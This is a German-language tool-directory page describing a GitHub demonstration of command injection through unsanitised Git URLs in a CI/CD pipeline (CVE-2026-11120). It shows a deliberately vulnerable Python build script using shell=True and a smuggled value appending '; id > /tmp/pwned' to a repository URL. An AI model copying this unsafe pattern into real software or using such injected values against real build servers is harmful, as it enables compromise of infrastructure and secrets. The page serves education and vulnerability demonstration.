Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — Demonstriert Befehlsinjektion über nicht bereinigte Git-URLs in CI/CD-Pipelines, einschließlich eines angreifbaren Build-Skripts und Exploit-Beispiels für eine kritische CVE. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
SchwachstellenanalyseExploitationDevSecOpsLernen & Bildung
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

Demonstriert Befehlsinjektion über nicht bereinigte Git-URLs in CI/CD-Pipelines, einschließlich eines angreifbaren Build-Skripts und Exploit-Beispiels für eine kritische CVE.

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-11120 – Command Injection über Git-URL in CI/CD-Pipeline

Programmcode (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – Command Injection über Git-URL in CI/CD

Severity: Critical

Überblick

Ein CI/CD-Pipeline-Skript verwendet nicht bereinigte, vom Benutzer bereitgestellte Git-Repository-URLs in einem Shell-Befehl. Ein Angreifer kann Shell-Befehle injizieren, indem er Sonderzeichen (z. B. , ) in die URL einfügt, was zur Ausführung beliebiger Befehle auf dem Build-Server führt.

;
&&

Details zur Schwachstelle

  • Typ: Command Injection
  • Auswirkungen: Kompromittierung der Build-Infrastruktur, Offenlegung von Geheimnissen.
  • Grundursache: Die Repository-URL wird ohne Maskierung oder Validierung direkt in einen Shell-Befehl verkettet.

Exploit-Demonstration

Führen Sie das verwundbare Skript aus:

root@kitploit:~
python cicd_build.py

Es führt den injizierten id-Befehl aus und erstellt /tmp/pwned.

Tool herunterladen